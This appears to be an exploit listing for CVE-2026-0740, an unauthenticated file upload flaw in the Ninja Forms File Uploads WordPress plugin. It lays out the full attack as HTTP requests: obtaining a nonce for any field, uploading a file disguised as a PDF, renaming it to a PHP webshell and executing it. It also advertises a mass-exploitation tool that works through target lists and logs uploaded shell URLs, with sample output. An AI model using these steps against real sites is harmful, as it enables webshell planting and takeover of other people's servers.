Share
## https://sploitus.com/exploit?id=9C3B812C-BAD2-53CB-8A4A-439A70A9B10D
# CVE-2026-0740 : Ninja Forms - File Upload <= 3.3.26 Unauthenticated Arbitrary File Upload.



### Description :

The Ninja Forms - File Uploads plugin for WordPress is vulnerable to unauthenticated arbitrary file upload due to missing file type 
validation and missing capability checks in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26

This flaw allows unauthenticated attackers to:
- Generate valid nonce for ANY field_id.
- Upload arbitrary files using whitelist bypass technique.
- Force server-side rename from whitelisted extension (.pdf) to PHP extension.
- The uploaded webshell will be stored at:
β†’ /wp-content/uploads/ninja-forms/tmp/
- Achieve Remote Code Execution (RCE) on the affected server.


# INFO : [**CVE-2026-0740**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms-uploads/ninja-forms-file-upload-3326-unauthenticated-arbitrary-file-upload)
~ **CVSS Score: 9.8 (Critical)** 

~ **Affected Versions: <= 3.3.26**
- Researcher : [**SΓ©lim Lanouar-(whattheslime)**](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/selim-lanouar)

## Attack Vector

```bash
Step 1: Get Nonce 
────────────────────────────────────
POST /wp-admin/admin-ajax.php
Data: action=nf_fu_get_new_nonce&field_id=7&form_id=7

Response: {"success":true,"data":{"nonce":"7a850757a1"}}

              β”‚
              β–Ό

Step 2: Upload Disguised File + Rename to PHP
──────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
Data:
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- files-7=@doc.pdf (whitelisted extension)
- doc_pdf=shadow.php (rename target)

              β”‚
              β–Ό

Step 3: Server Stores Malicious File
─────────────────────────────────────
Location: /wp-content/uploads/ninja-forms/tmp/shadow.php
Content: PHP shell (uploader / webshell)

              β”‚
              β–Ό

Step 4: execute uploaded file
────────────────────────────────────
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
β†’ Execute webshell
β†’ Full server takeover
```


```text
- Conclusions from field experiments:

1. The `nf_fu_get_new_nonce` endpoint returns a valid nonce without checking field existence
   β†’ No validation of `field_id` and `form_id` parameters (ANY random ID works)

2. Critical logical flaw in rename functionality
   β†’ Plugin accepts user-supplied filename via POST parameter
   β†’ No validation on final file extension after rename

3. Uploaded file lands directly in web-accessible directory
   β†’ /wp-content/uploads/ninja-forms/tmp/

4. The owner of this tool is very handsome
```

### features :
- automatically fetch nonce
- Exploit With Default ID
- Error Handling
- Auto-save results to shell.txt

## Usage :
- make sure filename is list.txt and is in the directory
- python/python3 shadow.py
 
## Output : 
```bash
˚⊱πŸͺ·βŠ°Λš NINJA FORMS MASS EXPLOITER ˚⊱πŸͺ·βŠ°Λš
 β•°β”ˆβž€ Full response display

[+] Loaded 100 targets

[1/100]
😈 [FRISKA RESEARCHER] Attack on: https://example.com
[*] Getting nonce...
[*] HTTP Status: 400
[*] Response: 0
[-] HTTP Error: 400

[2/100]
😈 [FRISKA RESEARCHER] Attack on: https://www.test.com
[*] Getting nonce...
[*] HTTP Status: 200
[*] Response: {"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] Nonce: b0404ec210
[*] Uploading shell...
[*] Upload response: {"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}

============================================================
πŸ”₯ SHELL UPLOADER: https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================
```

## This tool is for educational and security testing purposes only.
Unauthorized use of systems you don't own or don't have permission to test is illegal.